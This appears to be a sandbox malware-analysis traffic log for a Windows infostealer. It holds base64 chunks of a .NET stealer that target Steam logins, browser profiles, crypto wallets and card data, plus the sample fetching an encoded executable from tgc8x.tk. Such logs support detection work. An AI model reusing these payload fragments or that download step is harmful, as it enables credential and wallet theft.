2022-11-03 11:44:39 UTC	8	IN	Data Raw: 73 41 41 41 47 62 7a 6f 42 41 41 59 52 42 78 4d 47 33 67 4d 6d 33 67 41 52 42 69 77 49 42 68 45 47 62 7a 4d 41 41 41 6f 52 42 52 64 59 45 77 55 52 42 52 45 45 62 36 6f 41 41 41 59 2f 6b 66 37 2f 2f 39 34 4b 43 53 77 47 43 57 38 6b 41 41 41 4b 33 4e 34 44 4a 74 34 41 42 69 6f 49 4b 67 41 41 51 55 77 41 41 41 41 41 41 41 42 78 41 41 41 41 53 51 45 41 41 4c 6f 42 41 41 41 44 41 41 41 41 41 51 41 41 41 51 49 41 41 41 41 35 41 41 41 41 70 67 45 41 41 4e 38 42 41 41 41 4b 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 47 41 41 41 41 35 51 45 41 41 4f 73 42 41 41 41 44 41 41 41 41 41 51 41 41 41 52 73 77 42 51 42 7a 41 41 41 41 44 67 41 41 45 58 34 4b 41 41 41 4b 43 67 49 66 43 6f 30 4a 41 41 41 42 4a 64 44 54 41 41 41 45 4b 41 59 41 41 41 70 7a 42 77 41 41 43 69 Data Ascii: sAAAGbzoBAAYRBxMG3gMm3gARBiwIBhEGbzMAAAoRBRdYEwURBREEb6oAAAY/kf7//94KCSwGCW8kAAAK3N4DJt4ABioIKgAAQUwAAAAAAABxAAAASQEAALoBAAADAAAAAQAAAQIAAAA5AAAApgEAAN8BAAAKAAAAAAAAAAAAAAAGAAAA5QEAAOsBAAADAAAAAQAAARswBQBzAAAADgAAEX4KAAAKCgIfCo0JAAABJdDTAAAEKAYAAApzBwAACi
2022-11-03 11:44:39 UTC	15	IN	Data Raw: 4b 62 77 38 41 41 41 6f 71 41 41 41 62 4d 41 6f 41 74 51 45 41 41 43 49 41 41 42 46 7a 6f 67 41 41 43 67 70 7a 6c 51 41 41 43 67 73 48 48 78 6f 6f 52 77 41 41 43 68 67 58 47 49 30 49 41 41 41 42 4a 52 59 66 45 34 30 4a 41 41 41 42 4a 64 41 45 41 51 41 45 4b 41 59 41 41 41 70 7a 42 77 41 41 43 6e 4a 6d 42 41 42 77 66 67 6f 41 41 41 6f 6f 44 77 41 41 43 71 49 6c 46 78 38 4d 6a 51 6b 41 41 41 45 6c 30 41 34 42 41 41 51 6f 42 67 41 41 43 6e 4d 48 41 41 41 4b 63 6d 59 45 41 48 42 2b 43 67 41 41 43 69 67 50 41 41 41 4b 6f 69 67 42 41 51 41 47 62 36 4d 41 41 41 6f 48 48 78 77 6f 52 77 41 41 43 68 67 58 47 49 30 49 41 41 41 42 4a 52 59 66 45 34 30 4a 41 41 41 42 4a 64 41 45 41 51 41 45 4b 41 59 41 41 41 70 7a 42 77 41 41 43 6e 4a 6d 42 41 42 77 66 67 6f 41 41 41 Data Ascii: Kbw8AAAoqAAAbMAoAtQEAACIAABFzogAACgpzlQAACgsHHxooRwAAChgXGI0IAAABJRYfE40JAAABJdAEAQAEKAYAAApzBwAACnJmBABwfgoAAAooDwAACqIlFx8MjQkAAAEl0A4BAAQoBgAACnMHAAAKcmYEAHB+CgAACigPAAAKoigBAQAGb6MAAAoHHxwoRwAAChgXGI0IAAABJRYfE40JAAABJdAEAQAEKAYAAApzBwAACnJmBABwfgoAAA
2022-11-03 11:44:39 UTC	23	IN	Data Raw: 41 41 41 5a 7a 70 41 41 41 42 71 49 6f 6f 77 41 41 42 67 5a 7a 77 77 41 41 43 6e 30 5a 41 41 41 45 4b 4b 49 41 41 41 59 47 2f 67 61 70 41 41 41 47 63 38 51 41 41 41 6f 6f 45 41 41 41 4b 79 67 52 41 41 41 72 4b 4b 4d 41 41 41 59 71 41 41 41 41 47 7a 41 45 41 50 49 41 41 41 41 77 41 41 41 52 41 33 4f 4f 41 51 41 47 4a 58 4f 56 41 41 41 4b 62 33 45 42 41 41 59 6c 63 77 45 41 41 41 70 76 65 51 45 41 42 69 56 7a 4a 67 41 41 43 6d 39 37 41 51 41 47 4a 58 4f 51 41 41 41 4b 62 34 30 42 41 41 59 6c 63 35 41 41 41 41 70 76 67 51 45 41 42 69 56 7a 78 67 41 41 43 6d 39 39 41 51 41 47 4a 58 4f 51 41 41 41 4b 62 34 73 42 41 41 59 6c 63 79 59 41 41 41 70 76 68 51 45 41 42 69 56 7a 6b 41 41 41 43 6d 2b 48 41 51 41 47 4a 58 4f 56 41 41 41 4b 62 33 55 42 41 41 59 6c 63 35 Data Ascii: AAAZzpAAABqIoowAABgZzwwAACn0ZAAAEKKIAAAYG/gapAAAGc8QAAAooEAAAKygRAAArKKMAAAYqAAAAGzAEAPIAAAAwAAARA3OOAQAGJXOVAAAKb3EBAAYlcwEAAApveQEABiVzJgAACm97AQAGJXOQAAAKb40BAAYlc5AAAApvgQEABiVzxgAACm99AQAGJXOQAAAKb4sBAAYlcyYAAApvhQEABiVzkAAACm+HAQAGJXOVAAAKb3UBAAYlc5
2022-11-03 11:44:39 UTC	31	IN	Data Raw: 41 41 41 42 45 41 42 4a 57 41 41 4d 42 41 41 41 42 41 41 42 45 41 45 71 4f 41 41 4d 42 41 41 41 42 48 67 4a 37 49 77 41 41 42 43 6f 65 41 6e 73 6b 41 41 41 45 4b 68 73 77 41 67 43 5a 41 41 41 41 50 77 41 41 45 58 4d 49 41 51 41 4b 43 67 4e 76 43 51 45 41 43 67 73 72 62 77 64 76 43 67 45 41 43 67 77 43 4b 4d 59 41 41 41 59 49 62 36 38 42 41 41 59 6f 7a 67 41 41 42 69 78 56 41 69 6a 46 41 41 41 47 62 77 73 42 41 41 6f 4e 4b 79 34 53 41 79 67 4d 41 51 41 4b 45 77 51 52 42 41 68 76 72 51 45 41 42 6d 2b 2f 41 41 41 47 4c 42 59 52 42 41 68 76 77 41 41 41 42 69 77 4d 42 67 68 76 71 51 45 41 42 6d 38 4e 41 51 41 4b 45 67 4d 6f 44 67 45 41 43 69 33 4a 33 67 34 53 41 2f 34 57 4d 51 41 41 47 32 38 6b 41 41 41 4b 33 41 64 76 4a 51 41 41 43 69 32 4a 33 67 6f 48 4c 41 Data Ascii: AAABEABJWAAMBAAABAABEAEqOAAMBAAABHgJ7IwAABCoeAnskAAAEKhswAgCZAAAAPwAAEXMIAQAKCgNvCQEACgsrbwdvCgEACgwCKMYAAAYIb68BAAYozgAABixVAijFAAAGbwsBAAoNKy4SAygMAQAKEwQRBAhvrQEABm+/AAAGLBYRBAhvwAAABiwMBghvqQEABm8NAQAKEgMoDgEACi3J3g4SA/4WMQAAG28kAAAK3AdvJQAACi2J3goHLA
2022-11-03 11:44:39 UTC	39	IN	Data Raw: 52 66 6d 4d 42 41 41 6f 43 62 38 41 41 41 41 6f 6c 4c 51 51 6d 46 43 73 4c 41 79 6a 42 41 41 41 4b 62 33 73 41 41 41 6f 6c 4c 51 59 6d 66 67 6f 41 41 41 6f 4b 33 67 6b 6d 66 67 6f 41 41 41 6f 4b 33 67 41 47 4b 67 45 51 41 41 41 41 41 41 41 41 4b 53 6b 41 43 51 45 41 41 41 45 75 63 2f 73 41 41 41 61 41 4e 41 41 41 42 43 6f 4b 41 79 6f 79 41 32 2f 50 41 41 41 4b 62 39 41 41 41 41 6f 71 47 7a 41 43 41 47 41 41 41 41 41 47 41 41 41 52 41 69 68 7a 41 51 41 4b 66 54 63 41 41 41 51 44 41 6e 73 33 41 41 41 45 4b 41 41 42 41 41 59 73 45 41 49 58 66 54 67 41 41 41 51 43 65 7a 63 41 41 41 51 4b 33 6a 55 44 41 6e 73 33 41 41 41 45 4b 41 41 42 41 41 59 73 45 41 49 58 66 54 67 41 41 41 51 43 65 7a 63 41 41 41 51 4b 33 68 63 43 46 6e 30 34 41 41 41 45 41 77 72 65 44 43 Data Ascii: RfmMBAAoCb8AAAAolLQQmFCsLAyjBAAAKb3sAAAolLQYmfgoAAAoK3gkmfgoAAAoK3gAGKgEQAAAAAAAAKSkACQEAAAEuc/sAAAaANAAABCoKAyoyA2/PAAAKb9AAAAoqGzACAGAAAAAGAAARAihzAQAKfTcAAAQDAns3AAAEKAABAAYsEAIXfTgAAAQCezcAAAQK3jUDAns3AAAEKAABAAYsEAIXfTgAAAQCezcAAAQK3hcCFn04AAAEAwreDC
2022-11-03 11:44:39 UTC	47	IN	Data Raw: 41 58 41 42 56 41 47 34 41 61 51 42 75 41 48 4d 41 64 41 42 68 41 47 77 41 62 41 42 44 41 47 38 41 62 77 42 72 41 47 6b 41 5a 51 42 7a 41 47 6b 41 63 77 42 66 41 48 4d 41 5a 51 42 6a 41 48 55 41 63 67 42 6c 41 46 4d 41 62 77 42 6d 41 48 51 41 64 77 42 68 41 48 49 41 5a 51 42 63 41 46 59 41 59 51 42 73 41 48 59 41 5a 51 42 63 41 46 4d 41 64 41 42 6c 41 47 45 41 62 51 42 4d 41 47 38 41 5a 77 42 70 41 47 34 41 49 41 42 45 41 47 45 41 64 41 42 68 41 45 6b 41 52 41 41 36 41 43 41 41 61 51 42 7a 41 46 4d 41 5a 51 42 6a 41 48 55 41 63 67 42 6c 41 45 34 41 62 77 42 45 41 47 55 41 5a 67 42 79 41 47 51 41 52 41 42 6c 41 47 59 41 56 67 42 51 41 45 34 41 52 41 42 6c 41 47 59 41 64 77 42 68 41 47 45 41 63 77 42 6d 41 47 77 41 62 41 42 6c 41 48 51 41 59 51 42 7a 41 47 Data Ascii: AXABVAG4AaQBuAHMAdABhAGwAbABDAG8AbwBrAGkAZQBzAGkAcwBfAHMAZQBjAHUAcgBlAFMAbwBmAHQAdwBhAHIAZQBcAFYAYQBsAHYAZQBcAFMAdABlAGEAbQBMAG8AZwBpAG4AIABEAGEAdABhAEkARAA6ACAAaQBzAFMAZQBjAHUAcgBlAE4AbwBEAGUAZgByAGQARABlAGYAVgBQAE4ARABlAGYAdwBhAGEAcwBmAGwAbABlAHQAYQBzAG
2022-11-03 11:44:39 UTC	54	IN	Data Raw: 67 41 41 41 41 41 4a 59 41 47 44 65 68 41 51 45 41 34 43 4d 41 41 41 41 41 6b 51 41 67 51 4e 73 42 41 67 44 6b 4a 51 41 41 41 41 43 52 41 45 55 31 4a 41 49 44 41 4c 51 6f 41 41 41 41 41 4a 45 41 6f 45 56 59 41 67 51 41 6a 43 6f 41 41 41 41 41 6b 51 44 41 46 4a 45 43 42 51 43 73 4c 41 41 41 41 41 43 52 41 41 4d 33 33 51 41 47 41 41 67 74 41 41 41 41 41 4a 59 41 39 55 44 43 41 67 67 41 50 43 30 41 41 41 41 41 6b 51 42 5a 54 73 67 41 43 67 42 6b 4c 67 41 41 41 41 43 47 47 46 45 2f 51 51 41 4c 41 47 77 75 41 41 41 41 41 49 4d 41 55 77 4d 55 41 77 73 41 65 53 34 41 41 41 41 41 67 77 41 2b 43 42 34 44 43 77 43 47 4c 67 41 41 41 41 43 44 41 4a 77 4c 4b 41 4d 4c 41 4a 4d 75 41 41 41 41 41 49 4d 41 2b 51 34 79 41 77 73 41 6f 43 34 41 41 41 41 41 6b 52 68 31 50 34 Data Ascii: gAAAAAJYAGDehAQEA4CMAAAAAkQAgQNsBAgDkJQAAAACRAEU1JAIDALQoAAAAAJEAoEVYAgQAjCoAAAAAkQDAFJECBQCsLAAAAACRAAM33QAGAAgtAAAAAJYA9UDCAggAPC0AAAAAkQBZTsgACgBkLgAAAACGGFE/QQALAGwuAAAAAIMAUwMUAwsAeS4AAAAAgwA+CB4DCwCGLgAAAACDAJwLKAMLAJMuAAAAAIMA+Q4yAwsAoC4AAAAAkRh1P4
2022-11-03 11:44:40 UTC	62	IN	Data Raw: 35 7a 42 31 33 41 59 75 66 41 41 41 41 41 49 59 49 44 7a 6e 53 48 58 63 42 6c 4a 38 41 41 41 41 41 68 67 67 5a 50 72 6b 41 65 41 47 63 6e 77 41 41 41 41 43 47 43 43 6f 2b 72 77 42 34 41 57 51 75 41 41 41 41 41 49 59 59 55 54 39 42 41 48 6b 42 70 5a 38 41 41 41 41 41 68 67 67 4f 4c 72 6b 41 65 51 47 74 6e 77 41 41 41 41 43 47 43 42 73 75 72 77 42 35 41 62 61 66 41 41 41 41 41 49 59 49 61 42 57 35 41 48 6f 42 76 70 38 41 41 41 41 41 68 67 68 32 46 61 38 41 65 67 48 48 6e 77 41 41 41 41 43 47 43 50 49 72 75 51 42 37 41 63 2b 66 41 41 41 41 41 49 59 49 41 69 79 76 41 48 73 42 32 4a 38 41 41 41 41 41 68 67 6a 46 4e 37 6b 41 66 41 48 67 6e 77 41 41 41 41 43 47 43 4e 4d 33 72 77 42 38 41 65 6d 66 41 41 41 41 41 49 59 49 45 69 6d 35 41 48 30 42 38 5a 38 41 41 41 Data Ascii: 5zB13AYufAAAAAIYIDznSHXcBlJ8AAAAAhggZPrkAeAGcnwAAAACGCCo+rwB4AWQuAAAAAIYYUT9BAHkBpZ8AAAAAhggOLrkAeQGtnwAAAACGCBsurwB5AbafAAAAAIYIaBW5AHoBvp8AAAAAhgh2Fa8AegHHnwAAAACGCPIruQB7Ac+fAAAAAIYIAiyvAHsB2J8AAAAAhgjFN7kAfAHgnwAAAACGCNM3rwB8AemfAAAAAIYIEim5AH0B8Z8AAA
2022-11-03 11:44:40 UTC	70	IN	Data Raw: 43 75 77 76 79 46 63 4d 43 45 77 49 38 41 38 6b 43 75 77 73 2b 46 75 6b 43 75 77 74 50 46 67 45 44 45 77 49 38 41 77 6b 44 75 77 74 67 46 69 6b 44 75 77 74 78 46 6b 4d 44 45 77 49 38 41 30 6b 44 75 77 75 49 46 6d 6b 44 75 77 74 75 46 49 6b 44 75 77 74 2f 46 4b 6b 44 75 77 76 54 46 73 6b 44 75 77 76 71 46 75 6b 44 75 77 76 38 46 67 6b 45 75 77 73 4e 46 79 6b 45 75 77 74 4d 46 30 6b 45 75 77 74 63 46 32 45 45 45 77 49 38 41 32 6b 45 75 77 74 78 46 34 45 45 45 77 49 38 41 34 6b 45 75 77 73 6e 47 4b 4d 45 45 77 49 38 41 36 6b 45 75 77 74 41 47 4d 4d 45 45 77 49 38 41 38 6b 45 75 77 74 57 47 4f 6b 45 75 77 74 71 47 41 6b 46 75 77 75 43 47 43 6b 46 75 77 75 5a 47 45 6b 46 75 77 75 79 47 47 6b 46 75 77 76 47 47 49 6b 46 75 77 76 63 47 4b 6b 46 75 77 76 30 47 4d Data Ascii: CuwvyFcMCEwI8A8kCuws+FukCuwtPFgEDEwI8AwkDuwtgFikDuwtxFkMDEwI8A0kDuwuIFmkDuwtuFIkDuwt/FKkDuwvTFskDuwvqFukDuwv8FgkEuwsNFykEuwtMF0kEuwtcF2EEEwI8A2kEuwtxF4EEEwI8A4kEuwsnGKMEEwI8A6kEuwtAGMMEEwI8A8kEuwtWGOkEuwtqGAkFuwuCGCkFuwuZGEkFuwuyGGkFuwvGGIkFuwvcGKkFuwv0GM
2022-11-03 11:44:40 UTC	78	IN	Data Raw: 72 41 41 41 4d 41 52 79 72 41 41 41 4e 41 54 79 72 41 41 41 4f 41 56 53 72 41 41 41 50 41 56 36 72 41 41 41 51 41 57 53 72 41 41 41 52 41 59 4b 72 41 41 41 53 41 61 43 72 41 41 41 54 41 66 71 72 41 41 41 55 41 54 71 73 41 41 41 56 41 58 71 73 41 41 41 57 41 64 53 73 41 41 41 58 41 64 79 73 41 41 41 59 41 52 79 74 41 41 41 5a 41 56 79 74 41 41 41 61 41 58 71 74 41 41 41 62 41 61 53 74 41 41 41 63 41 62 53 74 41 41 41 64 41 64 53 74 41 41 41 65 41 53 43 75 41 41 41 66 41 62 69 75 41 41 41 67 41 65 69 75 41 41 41 68 41 66 43 75 41 41 41 69 41 51 61 76 41 41 41 6a 41 52 69 76 41 41 41 6b 41 54 43 76 41 41 41 6c 41 55 36 76 41 41 41 6d 41 56 79 76 41 41 41 6e 41 58 4b 76 41 41 41 6f 41 58 36 76 41 41 41 70 41 61 53 76 41 41 41 71 41 61 79 76 41 41 41 72 41 51 Data Ascii: rAAAMARyrAAANATyrAAAOAVSrAAAPAV6rAAAQAWSrAAARAYKrAAASAaCrAAATAfqrAAAUATqsAAAVAXqsAAAWAdSsAAAXAdysAAAYARytAAAZAVytAAAaAXqtAAAbAaStAAAcAbStAAAdAdStAAAeASCuAAAfAbiuAAAgAeiuAAAhAfCuAAAiAQavAAAjARivAAAkATCvAAAlAU6vAAAmAVyvAAAnAXKvAAAoAX6vAAApAaSvAAAqAayvAAArAQ
2022-11-03 11:44:40 UTC	86	IN	Data Raw: 32 4e 6a 46 44 51 7a 6b 30 4f 45 45 30 52 45 51 78 52 54 41 78 52 6a 49 77 52 44 59 78 4f 54 4a 46 4f 55 49 41 4d 30 51 34 4d 54 49 7a 52 55 49 33 51 6a 51 79 51 6a 41 79 51 54 6b 32 4e 6b 4a 42 4e 44 41 35 4f 44 55 30 4e 7a 55 31 4e 44 68 43 4e 44 42 43 52 54 56 42 51 67 41 30 4d 7a 59 35 4e 7a 49 35 52 44 68 43 4e 7a 6c 45 4d 45 4d 32 4e 54 46 46 4d 44 41 78 4d 7a 64 42 4d 30 49 79 4d 6b 45 78 51 54 49 30 52 45 56 43 51 6a 52 44 41 45 4d 31 4f 45 51 33 4d 44 63 79 4e 7a 59 32 4f 54 56 46 4e 7a 4d 7a 4f 44 59 7a 52 45 51 34 4d 6b 4d 32 52 45 59 30 52 45 59 32 4e 6b 45 7a 51 55 51 30 4f 55 4d 41 5a 32 56 30 58 30 4e 44 41 48 4e 6c 64 46 39 44 51 77 42 54 59 32 46 75 51 30 4d 41 61 45 52 44 41 44 56 47 4d 6b 59 35 4d 55 51 30 4e 45 45 79 4d 55 55 30 4d 6b Data Ascii: 2NjFDQzk0OEE0REQxRTAxRjIwRDYxOTJFOUIAM0Q4MTIzRUI3QjQyQjAyQTk2NkJBNDA5ODU0NzU1NDhCNDBCRTVBQgA0MzY5NzI5RDhCNzlEMEM2NTFFMDAxMzdBM0IyMkExQTI0REVCQjRDAEM1OEQ3MDcyNzY2OTVFNzMzODYzREQ4MkM2REY0REY2NkEzQUQ0OUMAZ2V0X0NDAHNldF9DQwBTY2FuQ0MAaERDADVGMkY5MUQ0NEEyMUU0Mk
2022-11-03 11:44:40 UTC	94	IN	Data Raw: 74 5a 51 42 77 63 6d 39 6a 54 6d 46 74 5a 51 42 6d 61 57 56 73 5a 45 35 68 62 57 55 41 64 47 46 69 62 47 56 4f 59 57 31 6c 41 48 4e 6c 64 46 39 47 61 57 78 6c 54 6d 46 74 5a 51 42 73 63 45 56 34 61 58 4e 30 61 57 35 6e 52 6d 6c 73 5a 55 35 68 62 57 55 41 52 32 56 30 56 47 56 74 63 45 5a 70 62 47 56 4f 59 57 31 6c 41 47 78 77 54 6d 56 33 52 6d 6c 73 5a 55 35 68 62 57 55 41 5a 6d 6c 73 5a 55 35 68 62 57 55 41 5a 32 56 30 58 30 31 68 59 32 68 70 62 6d 56 4f 59 57 31 6c 41 48 4e 6c 64 46 39 4e 59 57 4e 6f 61 57 35 6c 54 6d 46 74 5a 51 42 48 5a 57 4e 72 62 31 4a 76 59 57 31 70 62 6d 64 4f 59 57 31 6c 41 45 4e 6f 63 6d 39 74 5a 55 64 6c 64 46 4a 76 59 57 31 70 62 6d 64 4f 59 57 31 6c 41 47 64 6c 64 46 39 46 62 6d 64 73 61 58 4e 6f 54 6d 46 74 5a 51 42 48 5a 57 Data Ascii: tZQBwcm9jTmFtZQBmaWVsZE5hbWUAdGFibGVOYW1lAHNldF9GaWxlTmFtZQBscEV4aXN0aW5nRmlsZU5hbWUAR2V0VGVtcEZpbGVOYW1lAGxwTmV3RmlsZU5hbWUAZmlsZU5hbWUAZ2V0X01hY2hpbmVOYW1lAHNldF9NYWNoaW5lTmFtZQBHZWNrb1JvYW1pbmdOYW1lAENocm9tZUdldFJvYW1pbmdOYW1lAGdldF9FbmdsaXNoTmFtZQBHZW
2022-11-03 11:44:40 UTC	101	IN	Data Raw: 6f 65 53 35 59 4e 54 41 35 51 32 56 79 64 47 6c 6d 61 57 4e 68 64 47 56 7a 41 46 4a 6c 62 47 56 68 63 32 56 56 63 47 52 68 64 47 56 7a 41 45 64 6c 64 46 56 77 5a 47 46 30 5a 58 4d 41 55 33 52 79 61 58 42 52 64 57 39 30 5a 58 4d 41 52 6e 4a 76 62 55 31 70 62 6e 56 30 5a 58 4d 41 58 32 5a 70 62 47 56 43 65 58 52 6c 63 77 42 53 5a 57 46 6b 51 57 78 73 51 6e 6c 30 5a 58 4d 41 56 33 4a 70 64 47 56 42 62 47 78 43 65 58 52 6c 63 77 42 48 5a 58 52 43 65 58 52 6c 63 77 42 69 65 58 52 6c 63 77 42 53 5a 58 42 73 59 57 4e 6c 52 57 31 77 64 48 6c 57 59 57 78 31 5a 58 4d 41 52 32 56 30 54 47 39 6e 61 57 4e 68 62 45 52 79 61 58 5a 6c 63 77 42 44 55 32 68 68 63 6e 42 42 63 6d 64 31 62 57 56 75 64 45 6c 75 5a 6d 39 47 62 47 46 6e 63 77 42 44 55 32 68 68 63 6e 42 43 61 57 Data Ascii: oeS5YNTA5Q2VydGlmaWNhdGVzAFJlbGVhc2VVcGRhdGVzAEdldFVwZGF0ZXMAU3RyaXBRdW90ZXMARnJvbU1pbnV0ZXMAX2ZpbGVCeXRlcwBSZWFkQWxsQnl0ZXMAV3JpdGVBbGxCeXRlcwBHZXRCeXRlcwBieXRlcwBSZXBsYWNlRW1wdHlWYWx1ZXMAR2V0TG9naWNhbERyaXZlcwBDU2hhcnBBcmd1bWVudEluZm9GbGFncwBDU2hhcnBCaW
2022-11-03 11:44:40 UTC	109	IN	Data Raw: 6f 41 47 55 41 62 67 42 69 41 47 49 41 59 51 42 6b 41 47 51 41 62 77 42 71 41 47 6f 41 62 67 42 75 41 47 45 41 62 77 42 6e 41 47 59 41 63 41 42 77 41 47 59 41 61 67 41 41 44 32 6b 41 56 77 42 68 41 47 77 41 62 41 42 6c 41 48 51 41 41 45 46 68 41 47 30 41 61 77 42 74 41 47 6f 41 61 67 42 74 41 47 30 41 5a 67 42 73 41 47 51 41 5a 41 42 76 41 47 63 41 62 51 42 6f 41 48 41 41 61 67 42 73 41 47 38 41 61 51 42 74 41 47 6b 41 63 41 42 69 41 47 38 41 5a 67 42 75 41 47 59 41 61 67 42 70 41 47 67 41 41 41 31 58 41 47 38 41 62 51 42 69 41 47 45 41 64 41 41 41 49 56 55 41 62 67 42 72 41 47 34 41 62 77 42 33 41 47 34 41 52 51 42 34 41 48 51 41 5a 51 42 75 41 48 4d 41 61 51 42 76 41 47 34 41 41 41 4e 66 41 41 41 78 54 41 42 76 41 47 4d 41 59 51 42 73 41 43 41 41 52 51 Data Ascii: oAGUAbgBiAGIAYQBkAGQAbwBqAGoAbgBuAGEAbwBnAGYAcABwAGYAagAAD2kAVwBhAGwAbABlAHQAAEFhAG0AawBtAGoAagBtAG0AZgBsAGQAZABvAGcAbQBoAHAAagBsAG8AaQBtAGkAcABiAG8AZgBuAGYAagBpAGgAAA1XAG8AbQBiAGEAdAAAIVUAbgBrAG4AbwB3AG4ARQB4AHQAZQBuAHMAaQBvAG4AAANfAAAxTABvAGMAYQBsACAARQ
2022-11-03 11:44:40 UTC	117	IN	Data Raw: 56 45 52 45 42 45 6f 43 73 44 69 41 42 46 52 49 4a 41 51 67 56 45 68 30 42 45 6f 46 4d 43 53 67 41 46 52 49 4a 41 52 4b 41 72 41 55 6f 41 42 47 42 55 41 51 47 45 6f 43 34 42 41 59 53 67 61 45 4e 49 41 51 43 48 42 4b 42 71 52 4b 42 72 52 47 42 73 52 34 51 41 67 49 56 45 68 30 42 46 52 4b 42 74 51 49 65 41 52 34 41 46 52 49 64 41 52 34 41 46 52 49 56 41 68 34 41 48 67 45 47 43 67 49 65 41 42 34 42 43 52 55 53 67 4d 41 43 48 67 41 65 41 52 41 47 46 52 49 56 41 68 55 53 67 62 55 43 45 77 45 54 41 42 4d 41 43 67 59 56 45 6f 44 41 41 68 4d 41 45 77 45 4e 49 41 45 54 41 42 55 53 67 62 55 43 45 77 45 54 41 41 38 56 45 68 55 43 46 52 4b 42 74 51 49 65 41 52 34 41 48 67 41 4e 43 67 49 56 45 6f 47 31 41 68 34 42 48 67 41 65 41 42 63 51 41 67 49 56 45 68 30 42 48 67 Data Ascii: VEREBEoCsDiABFRIJAQgVEh0BEoFMCSgAFRIJARKArAUoABGBUAQGEoC4BAYSgaENIAQCHBKBqRKBrRGBsR4QAgIVEh0BFRKBtQIeAR4AFRIdAR4AFRIVAh4AHgEGCgIeAB4BCRUSgMACHgAeARAGFRIVAhUSgbUCEwETABMACgYVEoDAAhMAEwENIAETABUSgbUCEwETAA8VEhUCFRKBtQIeAR4AHgANCgIVEoG1Ah4BHgAeABcQAgIVEh0BHg
2022-11-03 11:44:40 UTC	125	IN	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 42 45 41 41 41 41 41 51 42 57 41 47 45 41 63 67 42 47 41 47 6b 41 62 41 42 6c 41 45 6b 41 62 67 42 6d 41 47 38 41 41 41 41 41 41 43 51 41 42 41 41 41 41 46 51 41 63 67 42 68 41 47 34 41 63 77 42 73 41 47 45 41 64 41 42 70 41 47 38 41 62 67 41 41 41 41 41 41 41 41 43 77 42 4c 51 42 41 41 41 42 41 46 4d 41 64 41 42 79 41 47 6b 41 62 67 42 6e 41 45 59 41 61 51 42 73 41 47 55 41 53 51 42 75 41 47 59 41 62 77 41 41 41 4a 41 42 41 41 41 42 41 44 41 41 4d 41 41 77 41 44 41 41 4d 41 41 30 41 47 49 41 4d 41 41 41 41 43 77 41 41 67 41 42 41 45 59 41 61 51 42 73 41 47 55 41 52 41 42 6c 41 48 4d 41 59 77 42 79 41 47 6b 41 63 41 42 30 41 47 6b 41 62 77 42 75 41 41 41 41 41 41 41 67 41 41 41 41 4d 41 41 49 41 41 45 41 52 67 42 70 41 47 Data Ascii: AAAAAAAAAAABEAAAAAQBWAGEAcgBGAGkAbABlAEkAbgBmAG8AAAAAACQABAAAAFQAcgBhAG4AcwBsAGEAdABpAG8AbgAAAAAAAACwBLQBAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAJABAAABADAAMAAwADAAMAA0AGIAMAAAACwAAgABAEYAaQBsAGUARABlAHMAYwByAGkAcAB0AGkAbwBuAAAAAAAgAAAAMAAIAAEARgBpAG

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.4	49696	50.115.174.192	443	C:\Users\user\Desktop\StZAEFSb2j.exe

Timestamp	kBytes transferred	Direction	Data
2022-11-03 11:44:40 UTC	127	OUT	GET /tt/BLACKDEV.txt HTTP/1.1 Host: tgc8x.tk
2022-11-03 11:44:40 UTC	127	IN	HTTP/1.1 200 OK Date: Thu, 03 Nov 2022 11:44:39 GMT Server: Apache Last-Modified: Thu, 03 Nov 2022 05:18:41 GMT Accept-Ranges: bytes Content-Length: 27992 Connection: close Content-Type: text/plain
2022-11-03 11:44:40 UTC	127	IN	Data Raw: 54 56 71 51 41 41 4d 41 41 41 41 45 41 41 41 41 2f 2f 38 41 41 4c 67 41 41 41 41 41 41 41 41 41 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 67 41 41 41 41 41 34 66 75 67 34 41 74 41 6e 4e 49 62 67 42 54 4d 30 68 56 47 68 70 63 79 42 77 63 6d 39 6e 63 6d 46 74 49 47 4e 68 62 6d 35 76 64 43 42 69 5a 53 42 79 64 57 34 67 61 57 34 67 52 45 39 54 49 47 31 76 5a 47 55 75 44 51 30 4b 4a 41 41 41 41 41 41 41 41 41 42 51 52 51 41 41 54 41 45 44 41 50 68 4e 59 32 4d 41 41 41 41 41 41 41 41 41 41 4f 41 41 44 69 45 4c 41 54 41 41 41 45 6f 41 41 41 42 4f 41 41 41 41 41 41 41 41 49 6d 67 41 41 41 41 67 41 41 41 41 67 41 41 41 41 41 42 41 41 41 41 67 41 41 41 41 41 67 41 Data Ascii: TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAgAAAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5vdCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAABQRQAATAEDAPhNY2MAAAAAAAAAAOAADiELATAAAEoAAABOAAAAAAAAImgAAAAgAAAAgAAAAABAAAAgAAAAAgA
2022-11-03 11:44:40 UTC	135	IN	Data Raw: 53 50 2f 48 72 6d 43 64 72 6a 61 31 52 37 2f 54 7a 67 48 48 2b 6e 53 37 62 71 56 4a 63 44 76 63 54 6a 2f 6c 6c 4c 4d 74 75 68 66 46 64 51 38 42 32 39 4e 64 32 4f 71 69 68 69 36 72 79 51 7a 56 36 43 6f 33 7a 32 6c 64 5a 30 38 6f 69 4d 39 65 48 41 39 53 2f 58 5a 46 45 79 30 66 2b 41 72 58 75 51 44 33 4b 6e 58 7a 62 38 37 4e 47 4e 69 39 46 73 44 79 62 50 71 65 5a 34 31 70 4d 34 39 34 4c 72 49 4b 75 41 38 49 6f 73 4a 51 68 39 32 49 50 32 58 34 4a 73 4d 2f 4d 50 77 37 77 79 71 4f 34 75 30 4d 4f 78 68 75 59 70 68 6c 4f 4d 49 64 35 43 72 67 42 4d 4e 7a 48 4e 67 71 59 4c 47 4e 59 72 4f 4e 57 76 59 67 55 76 4c 62 63 74 37 76 67 58 62 62 42 50 67 5a 31 6a 4a 63 79 44 44 45 63 42 6e 44 6a 51 79 48 45 4f 64 79 4f 31 67 2f 77 46 42 47 6a 48 41 50 49 68 71 63 48 64 5a Data Ascii: 